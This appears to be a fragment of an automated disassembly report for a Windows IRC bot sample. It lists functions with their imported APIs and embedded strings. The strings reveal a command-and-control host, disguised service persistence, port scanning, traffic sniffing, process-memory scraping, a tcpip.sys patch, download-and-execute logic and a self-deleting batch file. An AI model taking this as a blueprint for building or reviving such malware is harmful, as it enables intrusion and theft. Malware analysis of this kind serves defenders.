</font></pre></td></tr><tr id="sub_416308"><td><pre><a name="sub_416308"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_416308"><font size=+2>sub_416308</a>(573a)</font>:<font color=darkgreen>
	KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_41202B"><td><pre><a name="sub_41202B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41202B"><font size=+2>sub_41202B</a>(5769)</font>:<font color=darkgreen>
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy</font>
<font color=brown></font></pre></td></tr><tr id="sub_4056A2"><td><pre><a name="sub_4056A2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4056A2"><font size=+2>sub_4056A2</a>(5c06)</font>:<font color=darkgreen>
	WININET.InternetOpenUrlA
	KERNEL32.CreateFileA
	KERNEL32.GetTickCount
	WININET.InternetReadFile
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.CreateProcessA
	WS2_32.WSACleanup
	KERNEL32.ExitProcess
	WININET.InternetCloseHandle
	KERNEL32.ExitThread</font>
<font color=brown>
	"Couldn't open file: %s."
	"File download: %s (%dKB transferred)."
	"Update: %s (%dKB transferred)."
	"Filesize is incorrect: (%d !=	%d)."
	"Downloaded %.1f KB to	%s @ %.1f KB/sec."...
	"open"
	"Opened: %s."
	"Downloaded %.1fKB to %s @ %.1fKB/sec.	U"...
	"Update failed: Error executing file: %s"...
	"Bad URL, or DNS Error: %s."
</font></pre></td></tr><tr id="sub_4162B9"><td><pre><a name="sub_4162B9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4162B9"><font size=+2>sub_4162B9</a>(5cb8)</font>:<font color=darkgreen>
	KERNEL32.IsBadWritePtr</font>
<font color=brown></font></pre></td></tr><tr id="sub_41629D"><td><pre><a name="sub_41629D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41629D"><font size=+2>sub_41629D</a>(5cb8)</font>:<font color=darkgreen>
	KERNEL32.IsBadReadPtr</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AD8F"><td><pre><a name="sub_40AD8F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AD8F"><font size=+2>sub_40AD8F</a>(5e8f)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep
	KERNEL32.ExitThread</font>
<font color=brown>
	"IP: %s:%d, Scan|t: %d, Sub|thread: %d."
	"IP %s, Port %d is 0p3n."
	"as445"
</font></pre></td></tr><tr id="sub_405C48"><td><pre><a name="sub_405C48"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405C48"><font size=+2>sub_405C48</a>(63f7)</font>:<font color=brown>
	"%sKB"
	"failed"
</font></pre></td></tr><tr id="sub_4161FE"><td><pre><a name="sub_4161FE"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4161FE"><font size=+2>sub_4161FE</a>(6464)</font>:<font color=darkgreen>
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_414B11"><td><pre><a name="sub_414B11"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414B11"><font size=+2>sub_414B11</a>(6487)</font>:<font color=darkgreen>
	KERNEL32.GetEnvironmentStringsW
	NTDLL.RtlGetLastWin32Error
	KERNEL32.WideCharToMultiByte
	KERNEL32.FreeEnvironmentStringsW
	KERNEL32.GetEnvironmentStrings
	KERNEL32.FreeEnvironmentStringsA</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C7B0"><td><pre><a name="sub_40C7B0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C7B0"><font size=+2>sub_40C7B0</a>(658a)</font>:<font color=brown>
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...
</font></pre></td></tr><tr id="sub_405E21"><td><pre><a name="sub_405E21"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405E21"><font size=+2>sub_405E21</a>(677a)</font>:<font color=darkgreen>
	KERNEL32.GetLogicalDriveStringsA</font>
<font color=brown>
	"A:\\"
</font></pre></td></tr><tr id="sub_401179"><td><pre><a name="sub_401179"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401179"><font size=+2>sub_401179</a>(74f4)</font>:<font color=darkgreen>
	KERNEL32.OpenProcess
	KERNEL32.ReadProcessMemory
	WS2_32.send
	KERNEL32.Sleep
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_4120EF"><td><pre><a name="sub_4120EF"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4120EF"><font size=+2>sub_4120EF</a>(76df)</font>:<font color=darkgreen>
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_405FD6"><td><pre><a name="sub_405FD6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405FD6"><font size=+2>sub_405FD6</a>(79bd)</font>:<font color=darkgreen>
	KERNEL32.FreeLibrary</font>
<font color=brown></font></pre></td></tr><tr id="sub_404BAB"><td><pre><a name="sub_404BAB"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_404BAB"><font size=+2>sub_404BAB</a>(7e10)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount
	KERNEL32.SetErrorMode
	WININET.InternetOpenA
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetTempPathA
	KERNEL32.CreateMutexA
	KERNEL32.WaitForSingleObject
	ADVAPI32.GetUserNameA
	KERNEL32.lstrcmp
	KERNEL32.GetSystemDirectoryA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	KERNEL32.CopyFileA
	KERNEL32.CloseHandle
	KERNEL32.DeleteFileA
	KERNEL32.GetCurrentProcessId
	KERNEL32.OpenProcess
	KERNEL32.CreateProcessA
	KERNEL32.ExitProcess
	WS2_32.WSAStartup
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
<font color=brown>
	"Mozilla/4.0 (compatible)"
	"bawha"
	"CurrentUser"
	"InsideTm"
	"%s%s"
	"wmiapsrvs.exe"
	"wmiapsrvs.exe"
	"%s\\drivers\\%s"
	"%s %d \"%s\""
	"WMI Performance Adapter Services"
	"%s:*:Enabled:%s"
	"SYSTEM\\CurrentControlSet\\Services\\Share"...
	"Shit started."
	"cp.dawnsoul.info"
	"s"
	"cp.dawnsoul.info"
	"s"
	"s"
</font></pre></td></tr><tr id="sub_40E359"><td><pre><a name="sub_40E359"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40E359"><font size=+2>sub_40E359</a>(8039)</font>:<font color=darkgreen>
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_406676"><td><pre><a name="sub_406676"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406676"><font size=+2>sub_406676</a>(8205)</font>:<font color=brown>
	"~"
</font></pre></td></tr><tr id="sub_40E6DD"><td><pre><a name="sub_40E6DD"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40E6DD"><font size=+2>sub_40E6DD</a>(84dc)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AB1A"><td><pre><a name="sub_40AB1A"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AB1A"><font size=+2>sub_40AB1A</a>(8826)</font>:<font color=darkgreen>
	KERNEL32.ExitThread</font>
<font color=brown></font></pre></td></tr><tr id="sub_408EF0"><td><pre><a name="sub_408EF0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408EF0"><font size=+2>sub_408EF0</a>(89c1)</font>:<font color=darkgreen>
	KERNEL32.Sleep
	KERNEL32.SetFileAttributesA
	KERNEL32.CreateFileA
	KERNEL32.GetFileTime
	KERNEL32.CloseHandle
	KERNEL32.SetFileTime
	KERNEL32.ExitThread</font>
<font color=brown>
	"�"
	"G"
	"r+b"
	"Can not open TCPIP.SYS, version %d."
	"TCPIP.SYS fixed!, version %d."
</font></pre></td></tr><tr id="sub_40F144"><td><pre><a name="sub_40F144"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40F144"><font size=+2>sub_40F144</a>(8af0)</font>:<font color=darkgreen>
	NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_415F30"><td><pre><a name="sub_415F30"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415F30"><font size=+2>sub_415F30</a>(8bf1)</font>:<font color=darkgreen>
	KERNEL32.SetStdHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_4077DC"><td><pre><a name="sub_4077DC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4077DC"><font size=+2>sub_4077DC</a>(9457)</font>:<font color=darkgreen>
	KERNEL32.ExitThread</font>
<font color=brown>
	"GET	"
	" "
	"\r\n"
	"Error: shit failed, returned:	<%d>."
</font></pre></td></tr><tr id="sub_412DF3"><td><pre><a name="sub_412DF3"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412DF3"><font size=+2>sub_412DF3</a>(947c)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_409EEB"><td><pre><a name="sub_409EEB"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409EEB"><font size=+2>sub_409EEB</a>(948a)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.ioctlsocket
	WS2_32.connect
	KERNEL32.Sleep
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_410364"><td><pre><a name="sub_410364"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_410364"><font size=+2>sub_410364</a>(9ab4)</font>:<font color=darkgreen>
	KERNEL32.GetStartupInfoA
	KERNEL32.GetFileType
	KERNEL32.GetStdHandle
	KERNEL32.LockResource</font>
<font color=brown></font></pre></td></tr><tr id="sub_407C63"><td><pre><a name="sub_407C63"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_407C63"><font size=+2>sub_407C63</a>(9ac9)</font>:<font color=darkgreen>
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
	"DigitalProductId"
</font></pre></td></tr><tr id="sub_409650"><td><pre><a name="sub_409650"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409650"><font size=+2>sub_409650</a>(9b13)</font>:<font color=darkgreen>
	KERNEL32.ExitThread</font>
<font color=brown>
	"Listing ps:"
	"Ps list completed."
</font></pre></td></tr><tr id="sub_40A5BD"><td><pre><a name="sub_40A5BD"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A5BD"><font size=+2>sub_40A5BD</a>(9b6d)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown>
	"%dd %dh %dm"
</font></pre></td></tr><tr id="sub_407D3E"><td><pre><a name="sub_407D3E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_407D3E"><font size=+2>sub_407D3E</a>(9bc2)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA</font>
<font color=brown>
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"userenv.dll"
	"GetUserProfileDirectoryA"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
</font></pre></td></tr><tr id="sub_408AC2"><td><pre><a name="sub_408AC2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408AC2"><font size=+2>sub_408AC2</a>(9d9d)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.GetFileTime
	KERNEL32.CloseHandle
	KERNEL32.SetFileTime</font>
<font color=brown>
	"explorer.exe"
</font></pre></td></tr><tr id="sub_415EB9"><td><pre><a name="sub_415EB9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415EB9"><font size=+2>sub_415EB9</a>(a140)</font>:<font color=darkgreen>
	KERNEL32.SetStdHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_401822"><td><pre><a name="sub_401822"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401822"><font size=+2>sub_401822</a>(a6d5)</font>:<font color=brown>
	"%s%s%s"
	"%s%s"
</font></pre></td></tr><tr id="sub_414F92"><td><pre><a name="sub_414F92"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414F92"><font size=+2>sub_414F92</a>(a788)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_404901"><td><pre><a name="sub_404901"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_404901"><font size=+2>sub_404901</a>(ab7a)</font>:<font color=darkgreen>
	WS2_32.htons
	WS2_32.inet_addr
	WS2_32.gethostbyname
	WS2_32.gethostbyaddr
	WS2_32.socket
	WS2_32.connect
	WS2_32.closesocket
	KERNEL32.GetSystemDirectoryA
	KERNEL32.CreateThread
	KERNEL32.Sleep</font>
<font color=brown>
	"%s\\drivers\\tcpip.sys"
	"tcpip patcher!!"
</font></pre></td></tr><tr id="sub_409427"><td><pre><a name="sub_409427"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409427"><font size=+2>sub_409427</a>(abe8)</font>:<font color=darkgreen>
	KERNEL32.lstrcmpi
	KERNEL32.OpenProcess
	KERNEL32.TerminateProcess
	KERNEL32.CloseHandle
	KERNEL32.Module32First</font>
<font color=brown>
	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_40F6D4"><td><pre><a name="sub_40F6D4"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40F6D4"><font size=+2>sub_40F6D4</a>(aeff)</font>:<font color=darkgreen>
	KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_40A1B0"><td><pre><a name="sub_40A1B0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A1B0"><font size=+2>sub_40A1B0</a>(b0ed)</font>:<font color=brown>
	"IRC sn"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"
</font></pre></td></tr><tr id="sub_4073C5"><td><pre><a name="sub_4073C5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4073C5"><font size=+2>sub_4073C5</a>(b1ed)</font>:<font color=darkgreen>
	KERNEL32.GetDateFormatA
	KERNEL32.GetTimeFormatA
	KERNEL32.ExitThread</font>
<font color=brown>
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"...
	"HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"...
</font></pre></td></tr><tr id="sub_40600B"><td><pre><a name="sub_40600B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40600B"><font size=+2>sub_40600B</a>(b282)</font>:<font color=darkgreen>
	KERNEL32.LoadLibraryA</font>
<font color=brown>
	"/"
</font></pre></td></tr><tr id="sub_405BB7"><td><pre><a name="sub_405BB7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405BB7"><font size=+2>sub_405BB7</a>(b2db)</font>:<font color=darkgreen>
	KERNEL32.GetDriveTypeA</font>
<font color=brown>
	"?"
	"RAM"
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
</font></pre></td></tr><tr id="sub_405E94"><td><pre><a name="sub_405E94"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405E94"><font size=+2>sub_405E94</a>(b879)</font>:<font color=darkgreen>
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"SOFTWARE\\Clients\\StartMenuInternet\\fire"...
</font></pre></td></tr><tr id="sub_401648"><td><pre><a name="sub_401648"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401648"><font size=+2>sub_401648</a>(b92d)</font>:<font color=darkgreen>
	KERNEL32.GetLocalTime</font>
<font color=brown>
	"[%d-%d-%d %d:%d:%d] %s"
</font></pre></td></tr><tr id="sub_4152E6"><td><pre><a name="sub_4152E6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4152E6"><font size=+2>sub_4152E6</a>(b9df)</font>:<font color=darkgreen>
	KERNEL32.GetSystemTimeAsFileTime
	KERNEL32.GetCurrentProcessId
	KERNEL32.GetCurrentThreadId
	KERNEL32.GetTickCount
	KERNEL32.QueryPerformanceCounter</font>
<font color=brown></font></pre></td></tr><tr id="sub_41512C"><td><pre><a name="sub_41512C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41512C"><font size=+2>sub_41512C</a>(bf7b)</font>:<font color=darkgreen>
	KERNEL32.GetStringTypeW
	NTDLL.RtlGetLastWin32Error
	KERNEL32.MultiByteToWideChar
	KERNEL32.GetStringTypeA</font>
<font color=brown></font></pre></td></tr><tr id="sub_4013E5"><td><pre><a name="sub_4013E5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4013E5"><font size=+2>sub_4013E5</a>(c1da)</font>:<font color=darkgreen>
	KERNEL32.OpenProcess
	KERNEL32.ReadProcessMemory
	WS2_32.send
	KERNEL32.Sleep
	KERNEL32.CloseHandle</font>
<font color=brown>
	"PRIVMSG %s :Found string \"%s\" in \"%s\" \n"...
</font></pre></td></tr><tr id="sub_40DDA2"><td><pre><a name="sub_40DDA2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40DDA2"><font size=+2>sub_40DDA2</a>(c20d)</font>:<font color=darkgreen>
	KERNEL32.GetCurrentProcess
	KERNEL32.TerminateProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_414662"><td><pre><a name="sub_414662"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414662"><font size=+2>sub_414662</a>(c327)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle
	KERNEL32.UnhandledExceptionFilter</font>
<font color=brown></font></pre></td></tr><tr id="sub_408EA9"><td><pre><a name="sub_408EA9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408EA9"><font size=+2>sub_408EA9</a>(c854)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress</font>
<font color=brown>
	"sfc_os.dll"
</font></pre></td></tr><tr id="sub_4016B8"><td><pre><a name="sub_4016B8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4016B8"><font size=+2>sub_4016B8</a>(c9a2)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown>
	"%s\r\n"
</font></pre></td></tr><tr id="sub_40A226"><td><pre><a name="sub_40A226"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A226"><font size=+2>sub_40A226</a>(caaf)</font>:<font color=brown>
	"FTP sn"
</font></pre></td></tr><tr id="sub_40A274"><td><pre><a name="sub_40A274"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A274"><font size=+2>sub_40A274</a>(caaf)</font>:<font color=brown>
	"VULN sniff"
</font></pre></td></tr><tr id="sub_40A24D"><td><pre><a name="sub_40A24D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A24D"><font size=+2>sub_40A24D</a>(caaf)</font>:<font color=brown>
	"HTTP	sn"
</font></pre></td></tr><tr id="sub_40EE3F"><td><pre><a name="sub_40EE3F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40EE3F"><font size=+2>sub_40EE3F</a>(cba9)</font>:<font color=darkgreen>
	NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_408B66"><td><pre><a name="sub_408B66"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408B66"><font size=+2>sub_408B66</a>(ccdd)</font>:<font color=darkgreen>
	KERNEL32.GetTempPathA
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetFileAttributesA
	KERNEL32.SetFileAttributesA
	KERNEL32.ExpandEnvironmentStringsA
	KERNEL32.CreateProcessA</font>
<font color=brown>
	"%sdel.bat"
	"@echo	off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
	"%%comspec%% /c %s	%s"
</font></pre></td></tr><tr id="sub_40AFA2"><td><pre><a name="sub_40AFA2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AFA2"><font size=+2>sub_40AFA2</a>(d00d)</font>:<font color=darkgreen>
	NTDLL.RtlDeleteCriticalSection
	KERNEL32.InitializeCriticalSectionAndSpinCount
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.Sleep
	KERNEL32.ExitThread</font>
<font color=brown>
	"Failed to initialize critical	section."
	"%s:%d, Scann3r thread: %d, Sub|thread: "...
	"Failed to star thr34d, error:	<%d>."
	"Finished at %s:%d after %d minute(s) of"...
</font></pre></td></tr><tr id="sub_4144B2"><td><pre><a name="sub_4144B2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4144B2"><font size=+2>sub_4144B2</a>(d1c0)</font>:<font color=darkgreen>
	KERNEL32.GetModuleFileNameA
	KERNEL32.GetStdHandle
	KERNEL32.WriteFile</font>
<font color=brown>
	"<program name	unknown>"
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
</font></pre></td></tr><tr id="sub_40A29B"><td><pre><a name="sub_40A29B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A29B"><font size=+2>sub_40A29B</a>(d8e2)</font>:<font color=darkgreen>
	KERNEL32.ExitThread
	WS2_32.htons
	WS2_32.inet_ntoa</font>
<font color=brown>
	"-W00T- bind()	failed,	returned %d"
	"-W00T- WSAIoctl() failed, returned %d"
	"\"%s:%d\" to \"%s:%d\":	- \"%s\"\n"
	"%s"
	"%s"
</font></pre></td></tr><tr id="sub_408CE6"><td><pre><a name="sub_408CE6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408CE6"><font size=+2>sub_408CE6</a>(daea)</font>:<font color=darkgreen>
	WS2_32.getsockname</font>
<font color=brown></font></pre></td></tr><tr id="sub_40DD0D"><td><pre><a name="sub_40DD0D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40DD0D"><font size=+2>sub_40DD0D</a>(dc07)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetProcAddress
	KERNEL32.ExitProcess</font>
<font color=brown>
	"mscoree.dll"
	"CorExitProcess"
</font></pre></td></tr><tr id="sub_4012BA"><td><pre><a name="sub_4012BA"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4012BA"><font size=+2>sub_4012BA</a>(dcca)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.CloseHandle</font>
<font color=brown>
	"explorer.exe"
	"hidserv.exe"
	"WINLOGON.EXE"
	"SERVICES.EXE"
</font></pre></td></tr><tr id="sub_40151D"><td><pre><a name="sub_40151D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40151D"><font size=+2>sub_40151D</a>(dcca)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	KERNEL32.GetModuleFileNameA
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.CloseHandle</font>
<font color=brown>
	"explorer.exe"
	"hidserv.exe"
	"WINLOGON.EXE"
	"SERVICES.EXE"
</font></pre></td></tr><tr id="sub_40BEF1"><td><pre><a name="sub_40BEF1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40BEF1"><font size=+2>sub_40BEF1</a>(dde9)</font>:<font color=darkgreen>
	WS2_32.select
	WS2_32.__WSAFDIsSet</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AB64"><td><pre><a name="sub_40AB64"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AB64"><font size=+2>sub_40AB64</a>(de01)</font>:<font color=brown>
	"\\"
</font></pre></td></tr><tr id="sub_40CDF0"><td><pre><a name="sub_40CDF0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CDF0"><font size=+2>sub_40CDF0</a>(e1a4)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"%systemroot%\\system32\\cmd.exe"
</font></pre></td></tr><tr id="sub_417423"><td><pre><a name="sub_417423"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_417423"><font size=+2>sub_417423</a>(e1f4)</font>:<font color=brown>
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
</font></pre></td></tr><tr id="sub_40BB9B"><td><pre><a name="sub_40BB9B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40BB9B"><font size=+2>sub_40BB9B</a>(e415)</font>:<font color=brown>
	"CCCC"
	"0"
	"`"
</font></pre></td></tr><tr id="sub_409FE8"><td><pre><a name="sub_409FE8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409FE8"><font size=+2>sub_409FE8</a>(e48d)</font>:<font color=darkgreen>
	KERNEL32.ExitThread</font>
<font color=brown>
	"Done with (%iKB/sec)"
</font></pre></td></tr><tr id="sub_408995"><td><pre><a name="sub_408995"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408995"><font size=+2>sub_408995</a>(e49e)</font>:<font color=darkgreen>
	USER32.FindWindowA
	KERNEL32.CreateFileMappingA
